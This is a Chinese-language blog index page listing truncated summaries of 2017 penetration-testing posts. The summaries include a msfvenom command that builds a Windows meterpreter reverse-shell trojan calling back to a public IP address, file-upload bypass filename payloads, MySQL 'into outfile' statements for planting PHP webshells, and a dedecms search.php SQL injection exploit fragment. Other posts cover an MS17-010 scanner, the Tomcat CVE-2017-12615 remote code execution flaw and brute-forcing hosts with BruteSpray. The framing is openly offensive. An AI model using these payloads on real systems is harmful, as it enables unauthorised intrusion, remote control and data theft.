上一页 1 2 3 4 5 6 7 8 9 10 ··· 26 下一页
摘要: 内网渗透的时候有点用处,可以检测MS17-010的漏洞并获取操作系统信息,配合BURP可批量检测,纯socket发包,无需其他扩展。 用法很简单:http://127.0.0.1/ms17-010.php?host=10.211.55.10贴张图: 阅读全文
posted @ 2017-12-28 21:45 Hookjoy 阅读(1035) 评论(0) 推荐(0) 编辑
摘要: payload的几个常用生成 payload的几个常用生成 生成windows下的反弹木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f exe > 8888.exe// -p < pay 阅读全文
posted @ 2017-12-05 22:09 Hookjoy 阅读(20405) 评论(0) 推荐(0) 编辑
摘要: 这里附上两个payload: Content-Disposition: form-data; name=”up_picture”; filename=”[回车]1.php” Content-Disposition: form-data; name=”up_picture”; filename=[空格 阅读全文
posted @ 2017-12-05 22:07 Hookjoy 阅读(258) 评论(0) 推荐(0) 编辑
摘要: 1、select '' into outfile '/var/www/jumbo.php'; 2、select '' into dumpfile '/var/www/jumbo.php'; 3、Drop TABLE IF EXISTS temp;Create TABLE temp(cmd text NOT NULL);Insert INTO temp (cmd) VALUES('');Selec... 阅读全文
posted @ 2017-10-24 21:54 Hookjoy 阅读(3915) 评论(0) 推荐(0) 编辑
摘要: 去购买一个廉价VPS 阿里X/tx学生服务器然后选择Ubuntu系统http://jingyan.baidu.com/article/2c8c281dabacad0008252aa6.html安装MSF然后使用shellinaboxhttp://www.linuxidc.com/Linux/2015 阅读全文
posted @ 2017-10-09 23:56 Hookjoy 阅读(867) 评论(0) 推荐(0) 编辑
摘要: 漏洞描述 【漏洞预警】Tomcat CVE-2017-12615远程代码执行漏洞/CVE-2017-12616信息泄漏 https://www.secfree.com/article-395.html 漏洞作者 iswin from 360-sg-lab (360观星实验室) 漏洞等级 高 漏洞复现 阅读全文
posted @ 2017-09-21 11:53 Hookjoy 阅读(1744) 评论(0) 推荐(0) 编辑
摘要: sql注入lMySqlMySQL False注入及技巧总结MySQL 注入攻击与防御sql注入学习总结 SQL注入防御与绕过的几种姿势MySQL偏门技巧mysql注入可报错时爆表名、字段名、库名高级SQL注入:混淆和绕过MSSQLMSSQL DBA权限获取WEBSHELL的过程 MSSQL 注入攻击 阅读全文
posted @ 2017-09-19 21:59 Hookjoy 阅读(2689) 评论(0) 推荐(5) 编辑
摘要: php这个函数不算冷门第一个参数是保存的文件名,如果已存在则报错停止第二个参数是内容,可以是字符串,也可以使用file_get_contents获取一个马子内容其实不算什么冷知识了,只是有时候一句话会被拦截,用这个会直接生成一个大马,而且本身是没有什么特征的除非杀软直接监控的文件写入,换个加密马就行 阅读全文
posted @ 2017-09-15 13:59 Hookjoy 阅读(362) 评论(0) 推荐(0) 编辑
摘要: 大家搞内网或者C段渗透测试的时候可能遇到很多时候需要对大批的主机进行精确爆破,这时候BruteSpray就派上用场了。 BruteSpray是一款基于nmap扫描输出的gnmap/XML文件.自动调用Medusa对服务进行爆破(Medusa美杜莎 是一款端口爆破工具,速度比Hydra九头蛇快)。 B 阅读全文
posted @ 2017-06-26 20:13 Hookjoy 阅读(734) 评论(0) 推荐(0) 编辑
摘要: [通杀]dedecms plussearch.php 注入漏洞利用方式看结果如果提示Safe Alert: Request Error step 2 !那么直接用下面的exp查看源代码打印帮助1 /plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnI 阅读全文
posted @ 2017-06-13 01:20 Hookjoy 阅读(2790) 评论(0) 推荐(0) 编辑
上一页 1 2 3 4 5 6 7 8 9 10 ··· 26 下一页